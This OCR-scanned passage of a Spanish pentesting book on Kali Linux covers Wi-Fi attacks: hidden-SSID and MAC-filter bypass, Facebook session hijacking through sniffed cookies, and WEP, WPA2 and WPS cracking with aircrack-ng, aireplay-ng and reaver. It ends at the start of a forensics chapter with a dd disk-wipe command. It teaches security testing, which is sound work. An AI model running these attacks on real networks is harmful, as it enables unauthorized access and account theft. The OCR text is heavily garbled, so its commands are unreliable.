POR RXQ Beacons — Date, а/а CH т 


6 54 
6 54e 


38:72:08:9Е:АЕ:А7 - 
90:22:88:78:0Е:8Е - 5 54 


85510 STATION 
00:22:80:78:0E:8E  80:1C:BF:40:89:09 
Tmagen 06.03: Red detectada con SSID oculto. 


Tras realizar dicha acción el cliente volverá a autenticarse con el punto de acceso y se obti 
paquete con el nombre de la red, que viajará desde el cliente hacia el punto de acceso. Co 
acción se realiza el Bypass del SSID oculto, siempre y cuando haya un cliente asociado a la re 
no hubiera un cliente asociado a la red se puede recurrir a la fuerza bruta con la aplicación 


BSSID PWR RXQ Beacons 4Oata, f/s CH MB ЕМС CIPHER AUTH ESSID li 


-43 92 379 65 — 8 6 54. ОРМ 
Imagen 06.04: Obtención del SSID oculto, 


99:22:89:79:0Е:ВЕ 
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s, si se incluye el parámetro —w en la ejecución de airodump-ng se vuelca en un fichero CAP 
tráfico que circulaba por el aire. Este hecho ayuda, y mucho, si se quiere obtener un rango de 
es IP válida, ya que el servidor DHCP se encuentra deshabilitado. 


imagen se puede visualizar como el cliente asociado al punto de acceso ha estado realizado 
iones multicast a ciertos servicios, e incluso puede haber navegado a través de Internet, cuya 

п se vería en texto plano si el protocolo así estuviera construido. En definitiva, es muy fácil 
zar un Bypass del servidor DHCP. 


8 0.996436 192.168.0.63 192. 168.0.255 NBNS 
9 0.996418 IntelCor 4d:0b:bO (RA) 802.11 
19 0.996416 192.168.0.63 192. 168.0. 255 NBNS. 


IntelCor 4d:0b:bO (RA) 802.11 


Imagen 06.05: Obtención del rango de direcciones IP válido. 


o queda realizar el Bypass del filtrado MAC, para lo cual se observa con airodump-ng 
rección MAC asociada al punto de acceso concreto. Con la aplicación macchanger se puede 
ir el cambio en el adaptador y de esta manera no ser filtrado por el punto de acceso. En las 
es se puede visualizar como se realiza el cambio y como al listar las interfaces de red se 
iprobar que los cambios han surgido efecto. 
rootgkali:-£ ifconfig мап down 

--mac=00:1c:bf:4d:0b:b0 wlanó 

:71:1a:a8 (D-link Corporation) 

1а:а@ (0-11л{ Corporation) 


8:0 (Intel Corporate) 
гоо1@Ка11:-# ifconfig мапе up 


Link encap:Ethernet HWaddr 00:1c:bf:4d:0b:b0 

UP BROADCAST MULTICAST MTU:1508 Metric:l 

RX packets:8 errors:8 dropped:8 overruns:0 frame:0 
TX packets: errors:8 dropped:8 overruns:0 carrier:8 
collisions:8 txqueuelen:1808 

АХ bytes: (8.8 B) TX bytes:8 (8.8 В) 


Imagen 06.07: Dirección MAC modificada. 


ra e interpretación de tráfico abierto 


des abiertas, se identifican en airodump-ng mediante la nomenclatura OPN, son peligrosas 
¡privacidad e integridad de los datos que transmiten los usuarios. Este tipo de redes Wireless 
la información en el medio de transmisión sin ninguna capa que las proteja, por lo que 
er usuario con una tarjeta en modo monitor puede-leer dicha información. Hay que tener en 
le si el tráfico es, por ejemplo, HTTPS es éste protocolo quién protege la información, pero 
lico es HTTP, cualquier usuario sin asociarse a ese punto de acceso podría capturar dicha 


Pentesting con 


Este tipo de redes se encuentran en muchos lugares hoy en día, como pueden ser centros con 
universidades, redes de invitados de empresas. Es en esta última en las que se protege la 
Internet pero no el cifrado con el que los paquetes circulan por el aire. Por esta razón, el p 
ataque que se debe contemplar en temas Wireless es el de la red abierta. 


El procedimiento para realizar una captura de tráfico de una red abierta es el siguiente; 
- Tarjeta Wireless en modo monitor para capturar todo tipo de tráfico que circule por 
mediante el uso de la herramienta airmpn-ng. 

- Mediante el uso de la herramienta airodump-ng se pueden “atrapar” todos esos pa 
que circulan en el aire, visualizar direcciones MAC de los puntos de acceso, ver т 
asociadas a dichos puntos, ver a qué redes Wireless se conectan habitualmente los 
aunque la red no se encuentre en el presente entorno físico, calidad de la señal, 
Además, esta herramienta permite volcar a un fichero de tipo CAP el tráfico captura 
que pueda ser visualizado y analizado con herramientas como Wireshark, Network 
etcétera. 

- Una vez que se obtiene esta información en un CAP solo hay que ir filtrando y ob 
los datos de interés. 


Proof Of Concept: MITM en el aire e Hijacking de Facebook 

El escenario de esta prueba de concepto es el siguiente: 
- El punto de acceso no cifra los paquetes en el aire con los clientes asociados, 
- Existe un cliente asociado al punto de acceso. 
- El cliente está visitando una famosa página de una red social a nivel mundial, 


Como se ha mencionado anteriormente, el atacante puede escuchar el aire obteniendo todo el tri 
que circula por él. En primer lugar, el atacante colocará su tarjeta Wireless en modo monitor en 4 
Linux. 


`оо+@Ка11:-# airmon-ng start wlan 


ound 3 processes that could cause trouble. 

lif airodump-ng. aireplay-ng or airtun-ng stops working after 
short period of time, you may want to kill (some of) them! 
e 


PID мава 


NetworkManager 
мра supplicant 
dhelient 


Chipset Driver 


Ralink 2573 USB rt73usb - [phy8] 
(monitor mode enabled on топ) 


Imagen 06.08: Configuración de tarjeta Wireless en modo monitor. 


A continuación, y por lo general, se arranca airodump-ng con la siguiente instrucción airodumy 
mon0. Esta acción hará que la herramienta vaya saltando de canal capturando el tráfico de to 
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pero de este modo se pueden perder paquetes importantes que están en un canal en concreto 
cierto instante. 


resultados de la ejecución de airodump-ng se pueden visualizar en la imagen, donde llama la 

nción que existe una red con cifrado ОРМ, es decir, de tipo abierto. Además, en la parte inferior 

puede visualizar que existe un cliente asociado a dicho punto de acceso, por lo que seguramente 
té generando tráfico entre ambos. 


'apsed: 24 s ]| 2813-94-83 11:10 


CH ив ЕМС CIPHER AUTH ESSIO 


ІРЖА Beacons Foata, #/з 


6 54 . OPN Lawn 
PSK ServicioTecnico 2011| 
PSK AulasWifiló4 
PSK DLINX Telefonica 
PSK STecnico 
PSK Princesa Leia 
PSK ONOSBRZ2l 
PSK 

PSK 


ER 06.09: Descubrimiento de la red abierta. 


vez detectado este tipo de redes y de entender todos los parámetros que arroja airodump-ng, 
a filtrar la información mediante el uso de ciertos parámetros. La instrucción a ejecutar es 
hodump-ng —bssid «mac AP> --channel <número canal» -w «nombre fichero CAP» топ0, 
indo mon la interfaz en modo monitor. Con esta instrucción se está fijando airodump-ng a un 
en concreto y solo se están almacenando paquetes con el AP indicado. 


uede decir que en este instante se está realizando un Man In The Middle, gracias a que el medio 
ansmisión es el aire, y se está capturando la comunicación sin cifrar entre un cliente asociado a 
| punto de acceso y éste. 
CH 6 ][ Elapsed: 56 s ][ 2013-04-83 11:12 

BSSID PWR АХО Beacons Sata, #/з CH MB ENC CIPHER AUTH ESSID 


00:22:80:78:DE:BE -43 100 


Imagen 06.10. Arodump-ng pem el tráfico. 


ira poder visualizar la captura se utiliza el analizador de tráfico Wireshark disponible en Kali Linux. 
sniffer permitirá al atacante analizar toda la información obtenida del medio de transmisión y 
buscar información sensible o importante. 


Itro aplicado en Wireshark para realizar una búsqueda rápida es http contains Cookie, con este 
tro se mostrará solamente el tráfico HTTP que contengan cookies. En la imagen se puede visualizar 
se ha detectado una cookie interesante, perteneciente a Facebook. 


Peferert http://w. 


Imagen 06.11: Obtención de la cookie de un servi 


inyectará la cookie en el navegador. Ahora al visitar el sitio web se entrará con la sesión del 
asociado al punto de acceso. 


El tema de las cookies es muy aleatorio, ya que generalmente no se sabe de qué usuario o p 
una cookie hasta que no se entra en la sesión. 


Imagen 06.12: Inserción de los parámetros de la cookie en el plugin cookies manager +. 


Hacking WEP 


el apartado anterior. El único inconveniente que existe es que el tráfico entre el cliente y el 
de acceso se envía cifrado. Si el usuario malintencionado emplea tiempo en conseguir la 
de acceso a la red o, por cualquier otra razón ya la tiene, puede capturar el tráfico y vis 
sin necesidad de asociarse al punto de acceso. Para realizar el descifrado de paquetes capturad 
mediante el uso de la contrasefia de la red Wi-Fi se debe utilizar la herramienta airdecap-ng. 

utilidad pertenece a la suite de aircrack-ng. 


El procedimiento para realizar hacking WEP es el siguiente: 


1, ¿Es una red genérica o conocida? Es decir, si la red es de un operador clásico, se debe b 
la clave por defecto de dicha red. Es sencillo detectar redes de operadores genéricos, ya 
simplemente por el SSID se detectan. 


2. Si la red no es genérica o si lo es pero la clave ha cambiado, se debe buscar si hay un cl 
asociado a dicha red. En caso positivo se debe realizar un ataque А0 + АЗ, es decir, desautentic 
al cliente asociado con aireplay-ng y realizar la reinyección de paquetes ARP. Este 
siempre funciona, y los resultados son bastante rápidos, en unos 5 minutos se crackea la cla 


3. Si no existe un cliente asociado, se debe probar con la autenticación falsa, ataque А1+АЗ 
Se intenta autenticar en el punto de acceso, siempre y cuando éste lo permita, y realizar um 
reinyección de paquetes ARP. 
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4. Si el ataque anterior no funciona se debe probar con el ataque de ChopChop. 
5. Si ChopChop o Korek no funcionan, se debe probar con un ataque de fragmentación. 


ncionamiento WEP 


PP significa Wired Equivalent Privacy, y es un protocolo que no ofrece mucha seguridad en una 
red inalámbrica, ya que dicha seguridad está obsoleta y se conocen diversas maneras de descifrar el 
'contenido de las tramas que van cifradas con WEP. 


у que diferenciar entre la autenticación, confidencialidad e integridad. El protocolo WEP no ofrece 
a capa de seguridad en ninguna de estas 3 fases. En primer lugar se estudiará la autenticación, en 
cual se distinguen dos métodos: 

- Open System. 
- Shared Key. 


Op "n System deja autenticarse a todos los clientes en el punto de acceso, mientras que el método de 

ticación Shared Key requiere que el cliente envíe un mensaje solicitando conexión, el punto de 
ссеѕо contesta con un desafío, el cual debe ser cifrado por el cliente y reenviado al punto de acceso, 
i éste puede descifrarlo la autenticación es válida. 


fase de confidencialidad dispone de los siguientes elementos: 

- RCA, Es el algoritmo utilizado para generar el keystream, el cual se define más adelante. 
- ТУ. Vector de inicialización, son la parte dinámica de los keystream. Cada trama lleva un 
IV distinto, siempre que se pueda, ya que son generados aleatoriamente, El IV va en la parte 
no cifrada de la trama WEP. 

- RC4essimétrico, con la misma clave que se cifra se puede descifrar. 

- La creación del keystream dispone de 2 fases: KSA y PRGA. 


Imagen 06.13: Esquema de funcionamiento del protocolo WEP. 


Еп la imagen se puede visualizar el proceso que se lleva a cabo para formar la trama 
enviará, ya sea del AP al cliente o del cliente al AP. La shared key es estática, es la 
que configura el dueño de la red en el punto de acceso, o en casa en los router Wi-Fi, la t 
5 caracteres o 10 hexadecimales, o la de 13 caracteres o 26 hexadecimales. Los IV, com 

mencionado anteriormente, van cambiando aleatoriamente en cada trama enviada. La concate 
del IV y la clave estática es pasada al algoritmo RC4 como entrada, la salida de este 
produce el keystream. Este keystream es realmente el que generará el cifrado mediante la 
lógica XOR. El resultado de la operación lógiga ХОК entre el keystréam y el texto plano da. 
resultado la parte cifrada de la trama WEP. Hay que hacer un inciso, ya que la integridad se ca 
sobre el texto plano, mediante el ICV como se puede visualizar en la imagen. 2 


Por lo que se puede entender que А ХОК В XOR В = A, ¿Qué se quiere decir con esto? Сиа 
cliente genera la parte cifrada de la trama se utiliza un keystream XOR texto, obteniendo ип. 
Cuando el AP reciba dicha trama, éste le aplica el mismo keystream ХОК cifrado obte 
texto, en otras palabras texto XOR keystream XOR keystream = texto. 


El Keystream se crea mediante el algoritmo RCA, el cual recibe como entrada un seed o 
es el IV, y la clave estática 


¿Qué problemas tiene WEP? Por el uso de la clave estática se pueden realizar ataques de obsei 
y gracias a la estadística conseguir sacar el patrón de la clave, y de este modo conseguir li 
estática. 


El IV se envía siempre en plano, por lo que son captados por cualquiera, además de los 24 
los que están compuestos que es un valor demasiado corto. Recolectando un número alto de: 
puede, mediante ataque estadístico descifrar la clave. La autenticación se realiza del AP al 
pero no del cliente al AP, por lo que el cliente no sabe realmente si se conecta al AP que dice 
esta razón existen los Rogue AP, o MITM a través de un AP. 


Proof Of Concept: Hacking WEP 
En esta prueba de concepto se estudiará la posibilidad de hackear redes con cifrado WEP 
herramientas pertenecientes a Kali Linux. El escenario es el siguiente: 1 

- Punto de acceso con clave de 128 bits con cifrado WEP. 

- Cliente asociado a dicho punto de acceso. 

- Atacante con la distribución Kali Linux y tarjeta Wireless en modo monitor. 


En primer lugar, y como se ha ido realizando en las anteriores pruebas de concepto, el ataca 
colocará la configuración de su tarjeta inalámbrica en modo monitor. Con la herramienta airodun 
ng el atacante comenzará a volcar todo el tráfico que hay en el aire en la pantalla de su equipo: 
este punto es donde el atacante podrá detectar que existe una red con cifrado WEP y que айе! 
existe un cliente asociado a dicha red. 
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OW 6 ]| Elapsed: 4 s 11 2013-04-83 15:31 
asso PARIQ беке" ата, M/s Oi MB ENC CIPHER AUTH ESSID| 


00:22:89:70:06:BE -37 100 42 A Laa 


59 station PA йиз Lost Frames Probe 


00:229070:0€/8€ 09:1C:8F:40:08:98 -25 — 0-18 р и 
Imagen 06.14: Detección de red WEP y cliente asociado. 


o se puede visualizar hay un cliente asociado, lo cual hace que sea mucho más sencillo realizar 
eo de la clave WEP de la red. Hay que recordar que airodump-ng debe almacenar en una 
a CAP el tráfico que circula por el aire, y que con los filtros se puede afinar más la captura. 
ra llevar a cabo el ataque se debe utilizar la herramienta aireplay con dos objetivos distintos, el 
ero desautenticar al cliente asociado con el fin de que vuelva a autenticarse y genere un paquete 
P válido, y el segundo con el fin de capturar el paquete ARP y reinyectarlo para generar un gran 
nen de paquetes de datos. 


qué es importante generar muchos paquetes de datos? Como se estudió en la parte teórica, 
nportante obtener gran cantidad de IVs para poder predecir y atacar la clave que descifran los 


@ Sending 64 directed DeAuth. 
Sending 64 directed DeAuth. 
Sending 64 directed DeAuth. 
Sending 64 directed DeAuth. 
Sending 64 directed DeAuth. 


Imagen 06.15: Desautenticación del cliente asociado a la red con cifrado WEP. 


lanzar el ataque de reinyección se debe ejecutar la siguiente instrucción aireplay-ng -3 -b 
cción MAC AP> -h «dirección cliente? mon0, siempre y cuando monó sea la interfaz Wireless 
nodo monitor. 


2587 d 3060 АСК 
тегине 06.16: Reinyección de paquetes ARP. 


| reinyección generará gran cantidad de datos en la red inalámbrica, provocando en algunos 
saturación del AP. Airodump-ng mostrará por pantalla, en el parámetro #/s que hay un gran 
nero de paquetes de datos por segundo, y en el campo data se podrá visualizar que el número 
e a gran velocidad. 


imagen se puede observar como el número de daras ha crecido en poco tiempo a un valor alto. 
ra que para una clave WEP de 128 bits se deban capturar unos 100.000 paquetes, pero esto 
variar y no es fiable. 


Imagen 06.17: Crecimiento de los paquetes de datos. 


Lo recomendable es que a la vez que se realiza la reinyección con airodump-ng, en otra pe 
u otra shell, se esté capturando en un fichero el tráfico del aire. Pero además, se puede uti 
aircrack-ng a la vez que se realiza la reinyección para ir intentando obtener la clave del fichero 
tal y como se puede visualizar en la imagen. 


[ЕГИП 


[09:90:00] Tested 14068 keys (got 24724 IVa) 


bytetvot 
522! sorarsa) 28041984) 44141984) or(41472) 1804121) mune 
36143264) 7F(41904] 03(41216) 58(48192) BA(39680) ES[39699) РӘ! 19680) 
BALABABA) AF(43264] 13(43008) 9Є(42752) F4(42496) BF(41984) CA(41216) 
BS(47616) C7(42752) 09041472) SB(41216) 1F(48704) DA(4B784) A2! 

13520) 


э 
0 
1 
2 
3 
. 
H 
H 
7 
А 
Н 


[40968] DC(40960) 02148784) 9С(40448) 
аде) Ба «)а70) агау!) 99141916) Сг?) 82141216) 89111910) 
2143060) 61043908) FB(42496) 1C42496) 0240448) 04(40192) А01 40192) 


KEY FOUND! | 9:36:34:68:30:72:33:78:32:72:21:21:21 1 SCIT: 164fOrIV3r! H! 1 
Decryoted correctly: 180% 


Imagen 06.18: Crackeo de la clave МЕР. 


Por último, una vez que se tiene la clave de la red, si no se quiere autenticar en la misma pat 
dejar rastro se podría utilizar la herramienta airdecap-ng para descifrar el tráfico de la red. En 
palabras, el atacante puede utilizar airodump-ng para capturar el tráfico del aire, el cual se enci 
cifrado con WEP y utilizar la herramienta airdecap-ng para conseguir visualizar la info: 
viaja por el aire, gracias a que anteriormente se ha obtenido la clave. 


Este hecho se denomina MITM en el aire y sin dejar huella, уа que no hay un registro de la 
Wireless en ningún lugar. 


Hacking WPA & WPS 


WPA, Wi-Fi Protected Access, surge como una solución temporal de la Wi-Fi Alliance para s 
las redes Wireless una vez que quedó de manifiesto la debilidad de WEP, Wired Equivalent P 
Ambas soluciones, WPA y WPA2, soportan el protocolo 802.1x para la autenticación en 
empresariales y la autenticación mediante clave compartida PSK, Pre-Shared Key, para los en 
SOHO, Small Office and Home Office, y ámbitos domésticos. 


WPA y WPA2 se diferencian poco conceptualmente y difieren principalmente en el algorit 
cifrado que emplean. Mientras WPA basa el cifrado de las comunicaciones en el uso del algori 
TKIP (Temporary Key Integrity Protocol), que está basado en RC4 al igual que WEP, 
utiliza CCMP, (Counter-mode/CBC-MAC Protocol) basado en AES /Advanced Encrytion 
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a segunda diferencia notable se encuentra en el algoritmo utilizado para controlar la integridad 
del mensaje. Mientras WPA usa una versión menos elaborada para la generación del código MIC 
" Message Integrity Code, o código “Michael”, WPA2 implementa una versión mejorada de MIC. 


diferencia con una red abierta o WEP, es que el punto de acceso y cliente negocian una política 
seguridad a seguir, como primera fase de la autenticación. Este proceso es importante, ya que el 
cliente se conecta a la red sin que haya comenzado el proceso de autenticación, por lo que el tráfico 
está siendo cifrado todavía, lo que permitiría realizar un ataque de desautenticación o conocido 
nbién como ataque 0, que provocaría que el cliente comenzase un nuevo proceso de autenticación 
y asociación. En la fase de intercambio de claves el cliente y el AP utilizan la PSK para generar un 
ive llamada PMK (Pairwise Master Key). Esta PMK es una derivada cuando el sistema es WPA/ 
PA2 empresarial pero es la misma PSK en los entornos WPA/WPA2 PSK. 


la PMK se genera una clave de cifrado para cada proceso de autenticación de un cliente llamada 
TK que básicamente se genera a partir de dos números aleatorios, uno de ellos generado por el 

te y el otro por el punto de acceso que intercambian para obtener ambos la misma clave РТК. 
te proceso se llama 4-way-Handshake. 


Jna vez que el cliente está autenticado, el protocolo TKIP utiliza 6 claves de cifrado por cada sesión, 
{ de ellas son utilizadas para comunicaciones unicast y 2 para comunicaciones multicast. Estas 
laves son únicas por cliente y sesión y se cambian periódicamente. Estas claves se generan a partir 
de derivadas de las direcciones MAC, ESSID y la PTK. 


atacante que quiera vulnerar una red WPA-PSK va a tratar de capturar ese intercambio de 
ümeros aleatorios, para una vez conocidos estos, junto con el SSID y las direcciones MAC del 
ente y el punto de acceso de la red obtener la frase o secreto compartido que se utilizó. Una vez 
ue el atacante tenga la clave compartida se podrá conectar a la red. 


PS, Wi-Fi Protected Setup, es un estándar de 2007, promovido por la Wi-Fi Alliance para facilitar 

rio doméstico la configuración y creación de redes WLAN. WPS no es un mecanismo de 

eguridad por sí mismo, sino que se trata de la definición de diversos mecanismos para facilitar la 

onfiguración de una red WLAN segura con el protocolo WPA2. Los métodos que utiliza WPS son 
| siguientes: 

- PIN. La credencial se intercambia después de introducir un PIN. Este método es de los 

más distribuidos con WPS y el más inseguro. 

- PBC.La generación e intercambio de las credenciales ocurren después de que el usuario 

ejecute una acción física, como es presionar un botón incluido en el dispositivo. 

- NFC.Intercambio de credenciales a través de comunicación NFC. 

- USB. Las credenciales se transfieren mediante un dispositivo de memoria flash. 


Of Concept: Hacking WPA/WPA2 
tà prueba de concepto se estudiará el crackeo de una red con cifrado WPA. El escenario es el 
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- Punto de acceso соп ESSID *LaWR" y con cifrado de tipo WPA2 / CCMP. 
- Cliente asociado al punto de acceso. 
- El atacante dispone de la distribución Kali Linux. 


En primer lugar y como se ha realizado en las pruebas anteriores se debe configurar 
Wireless en modo monitor con la aplicación airmon-ng. Después, airodump-ng es 
capturar el tráfico entre el punto de acceso y el cliente asociado, el objetivo en este caso es 
el handshake. Si el cliente ya se encuentra asociado hay que realizar un ataque de йеѕаш 
para que airodump-ng pueda capturar el handshake. 


En la imagen se puede visualizar como tras el ataque de desautenticación, mediante la in: r 
aireplay -0 5 -a «dirección MAC AP> -c «dirección MAC cliente? mon0, el cliente se 
asociar y se consigue el handshake. 


Imagen 06.19: Captura del handshake de la asociación del cliente con el punto de acceso, 


Una vez que se dispone de una captura con el handshake en ella, se prepara una base de da 
modo de rainbow table en la que se obtendrán PMKs para un ESSID en concreto. ¿Cómo se pre 
esta base de datos? Airolib-ng permite al usuario realizar esta acción, solamente hay que det: 
requisitos: 
- Fichero con los ESSID para los que se quieren generar las PMKs. 
- Fichero con las palabras que son las posibles contraseñas de la red, es decir, un diccionz 
- Ез recomendable que el diccionario sea grande y con el mayor número de palabras. 
- Рага cada ESSID se generará una tabla con las PMKs precalculadas, 


Lo explicado anteriormente es similar al funcionamiento de las rainbow tables para crackear 
En la imagen se puede visualizar como airolib-ng trabaja. 


ооф Кә1\1:-# airolib-ng crackmpa --stats 
here are 1 ESSIDS and 16 passwords in the database. B out of 16 possible combinations have been comput] 
d (9%). 


SSID Priority 
эй 64 9.6 


Imagen 06.20: Generación de la Rainbow Table de PMKs. 
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[rootakali:=F airolib-ng crackwpa --clean all 
Deleting invalid ESSIDS and passwords... 
Deleting unreferenced PMK: 


Done. 
lrootgkali:-8 airolib-ng crackwpa --batch 
omputed 16 РМК in 1 seconds (16 PMK/s, O in buffer]. ALL ESSID processed. 


airolib-ng crackwpa 
PMKs. This could take 


Imagen 06.21: Verificación de la base de datos creada con airolib-ng. 


“vez que se tiene creada la base de datos se debe lanzar aircrack con la instrucción aircrack-ng 
«fichero DB» «fichero CAP». Aircrack-ng comenzará a probar las РМК contra el tráfico de la 
ira y devolviendo la clave si en alguna de las claves es válida. 


sys Tested 
KEY FOUND! [ 184für3var!!! 1 
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Imagen 06.22: Crackeo más rápido que con diccionario con airolib-ng y aircrack-ng. 


Of Concept: Hacking WPA2 con WPS 

prueba de concepto se comprobará la detección de WPS y como éste puede hacer que el 
a WPA sea mucho más rápido de lo que podría ser con una clave compleja y diccionario. El 
lario es el siguiente: 

= Punto de acceso con WPA2 y WPS activo y vulnerable. 

= Nose requiere de un cliente asociado a dicho punto de acceso. 

- Е! atacante utilizará Kali Linux, y en concreto la herramienta reaver para llevar a cabo el 


ataque. 
El atacante utilizará Wireshark para detectar WPS activo en una red. 


r ! Siempre se debe activar el modo monitor y configurar airodump-ng para capturar el tráfico 
ire, esta vez el objetivo es obtener una muestra de los heacons de información de los puntos 


ando con Wireshark los paquetes donde los puntos de acceso indican su SSID se puede buscar 
irtado tagged el campo WPS. En el instante en que se encuentre dicho campo se puede 
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afirmar que el punto de acceso está utilizando WPS. El siguiente paso es probar a ver 
dispositivo es vulnerable a la fuerza bruta contra el PIN que se pretende realizar. 


raffic Indication Map (TIM): DTIM O of O bitmap 
ERP Information 


ERP Information 
RSN Information 
Extended Supported Rates/6, 9, 12, 48, IMbit/sec] ` 
HT Capabilities (802.11n 01.10) 
: HT Information (802.11n 01.10) 


Imagen 06.23: Detección de WPS activo en un router. 


Porúltimo, una vez que se ha detectado WPS en un punto de acceso se prueba mediante la hei 
reaver si dicho punto de acceso es vulnerable. La herramienta realizará fuerza bruta sobre. 
de acceso enviando distintos PIN hasta encontrar el que le devuelva la credencial de la re 
cifrado WPA2. 


WPS es muy común de encontrar en ciertos routers de proveedores de Internet, así como 
Wireless modernos. Hay que tener cuidado con las configuraciones por defecto ya que éstas pt 
provocar que WPS esté activo y el responsable del punto de acceso sea consciente de ello, 


Reaver v1.4 WiFi Protected Setup Attack Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffnergtacnetsol .com» 


[+] Waiting for beacon (тоа 30:48:9):70:F5:81 
[+] Associated with 38:46: 181 (ESSID: STecnico) 
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Capítulo VII 
Forense con Kali 


ntroducción al análisis forense 


definición de análisis y analista forense no es realmente sencilla. Existen gran cantidad de 

finiciones que en general incluyen a la persona que estudia qué ha sucedido, cómo ha sucedido y 
lo ha realizado. En líneas generales el análisis forense es el proceso de estudio exhaustivo de 

ema del que se desea conocer su historia. En dicho sistema se sospecha, o incluso se tiene la 

ега, de que se ha sido víctima de una intrusión o ataque contra una máquina о usuario concreto. 
vías para llevar el ataque son muy variadas, lo que conlleva que el análisis forense se pueda 

sglosar en distintas ramas: 

- Análisis forense de sistemas o imágenes. 

- Análisis forense de red. 

- Análisis forense de malware. 

- Análisis forense de RAM. 

- Análisis forense de metadatos. 


ivo final es el mismo, se tome la vía que se tome, lograr evidencias de lo que ha ocurrido, 
ha sucedido y quién lo ha realizado. En su defecto, si no se pueden lograr las evidencias, se 
in obtener indicios que puedan ser utilizados. Hay que tener en cuenta que un análisis forense 
ser llevado a juicio como una prueba, por lo que la captura de evidencias y el tratamiento de 
аз es primordial, ya que una incorrecta captura de éstas pueden invalidar dicha prueba. 


ciertos aspectos que suelen ser de utilidad en una investigación: 
- Método utilizado por el atacante para entrar al sistema. 

* Actividades ilícitas realizadas por el atacante. 

= Alcance e implicaciones de dichas actividades. 

= Backdoors o malware instalado en el sistema. - 


que se puede deducir de la lista anterior, el objetivo es intentar dar el máximo de respuestas 
es para que, en caso de existir alguna acción maliciosa o delictiva por parte de un usuario, se 


pueda tratar e incluso denunciar dicha acción. En algunas ocasiones el análisis forense es 
como un arte de ingeniería. Los casos forenses se aplican en temas de fraudes, casos civiles, d 
informáticos, conectividad corporativa o laboral, etcétera. і 


Según las estadísticas la mayoría de los ataques se producen en un ámbito laboral у de di 
organismos. Además, este tipo de ataque proviene del interior de estos, y generalmente вой t; 
por la imagen de la empresa u organismo de cara al exterior. Otro foco son los ataques 
ya que existen gran cantidad de tipos de ataque externos que se basan en versiones de aplic 
antiguas, no parcheadas, vulnerables en códigó, etcétera. 


Los incidentes más comunes son los accesos no autorizados, por ejemplo, el usuario 
sistema al cual no debería poder acceder. La ejecución de código malicioso es otro de los 
más comunes, por ejemplo la ejecución de roorkit. Por último, la interrupción de un 
utilización no autorizada del mismo es otro de los incidentes que más se encuentra el analista 


Toda investigación requiere de la búsqueda y captura de evidencias. La evidencia digital 
aquella información electrónica que puede aportar algún dato para un análisis forense d 
Algunos ejemplos de evidencias son: 

- Fecha del último acceso a un fichero o aplicación. 

- Unregistro de acceso a un fichero. 

- Опа cookie de navegación web almacenada en un disco duro. 

- Eluptime del sistema. 

- Un fichero en disco. 

- Un proceso en ejecución. 

- Un disco duro, un pendrive и otro dispositivo de almacenamiento. 


información concreta y verificable. Es de gran importancia para el analista forense que se гес 
todas las evidencias posibles y que todas sean tratadas y analizadas de manera responsabl 
perturbando el contenido que almacenan. 


¿Qué evidencias pueden ser invalidadas? Aquellas que vulneren la intimidad o revelen info 
personal, las que vulneren las normativas de seguridad de la propia empresa u organi. 
aquellas que no puedan ser demostradas como no manipuladas. Por estas razones la captur: 
tratamiento de las evidencias es uno de los aspectos más importantes de todo análisis forense. 


2. Captura de evidencias 


Uno de los aspectos fundamentales a la hora de ejecutar un análisis forense digital, es la necesit 
contar con evidencias válidas. Todas aquellas recogidas correctamente son potencialmente 
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pero una mala práctica o un pequeño descuido en el proceso de captura pueden llegar a invalidarlas, 

Cuando se presume que sobre un equipo se ha realizado una acción maliciosa y que debe ser objeto de 

análisis, la prudencia es esencial. Siempre debe considerarse que puede ser que contenga evidencias 

interesantes y debido a esto es necesario tratarlo como un sistema con información importante y 

sensible para el caso. De no hacerlo permite en caso de juicio poder argumentar que las evidencias 

sustraídas del equipo pueden haber sido alteradas durante el estudio con el objetivo de favorecer o 
_ їпсгїтїпаг a alguien. 


Para llevar a cabo este tipo de estudios, no existe un procedimiento único, así como tampoco existen 
unas herramientas certificadas que sirvan específicamente a efectos judiciales. A día de hoy existe un 
modelo de buenas prácticas que puede servir de ayuda и orientación a realizar estudios de este tipo, 
como lo es el RFC 3227 "Guía para la recogida y almacenamiento de evidencias”. Sin embargo, 
El uso de esta guía no garantiza el éxito total en el proceso de captura de evidencia y la validez total 
ellas, debido a la falta de una legislación para el análisis forense digital en España y en muchos 
іѕеѕ de la Unión Europea. Por ello no puede expresarse de manera específica qué proceso es el 
uado ni cuáles son las herramientas necesarias y cómo deben utilizarse. 


incipalmente hay que considerar a una serie de elementos: 

- ¿Cuál es el escenario? 

- (Qué quiere analizarse? 

- ¿De cuánto tiempo se dispone para la captura de evidencias? 
- ¿Dónde se almacenarán las evidencias recolectadas? 

- ¿Cuántas copias se deben realizar? 


primer proceso en un análisis forense, (y posiblemente el más crítico del proceso de captura 
evidencias), es el proceso de copiado de un disco o ficheros afectados, dicho proceso debe de 
Itizar las siguientes condiciones: 

| - Las unidades destinadas a almacenar las copias deben ser borradas de manera segura, 
Algunos estándares a nivel mundial definen que para realizar un borrado seguro del dispositivo 
el proceso debe repetirse entre 3 y 35 veces dependiendo del estándar. Estos procesos no son 
más que la sobre escritura total de valores fijos y/o aleatorios en la unidad para asegurar que 
по quede rastro de lo contenido anteriormente. 

- Las copias realizadas deben ser idénticas al origen y por consecuente entre ellas también. 


- Bajo ningún motivo debe ser alterado el origen de los datos ni el destino. Esto podría 
conllevar que la copia no pueda utilizarse para el proceso de análisis, e incluso puede invalidar 
todas las evidencias obtenidas después del mismo. En cualquier caso, deberá repetirse la 
creación de una copia. 

- Elcopiado debe ser completo, incluyendo el espacio libre ya que muchas veces es posible 
que se consiga información valiosa en él, especialmente si se ha utilizado algün tipo de 
herramientas "antiforenses". 


- Debe aplicarse una función hash sobre la información adquirida para 
momento la integridad de las copias. 


Este último aspecto es esencial, garantizando así que las conclusiones a las que se Пер; 
análisis de las copias realizadas, parten de un disco o ficheros idénticos al original y 

momento han sido manipulados después de haber sido generados. Permite reforzar la valide: 
pruebas y del proceso forense. Para la obtención del hash suele utilizarse MDS, sin embargo 
a los casos de colisiones en este algoritmo de resumen suele acompañarse de otros como por 
el SHA-1. 


Para realizar todo este proceso, una herramienta muy utilizada y que está presente en. 
sistemas GNU/Linux es el comando “dd.” Este comando permite copiar y convertir dat 
nivel. Puede utilizarse tanto para hacerse el borrado seguro de la unidad donde se 
copia como para realizar los duplicados del origen a estudiar, 


Lo primero que se debe hacer siempre en un proceso forense es un borrado seguro de t 
dispositivos que van a almacenar las copias. Para esto se usa el siguiente comando: 


"dd if=/dev/zero of= (dispositivo para copia] bs=1M" 


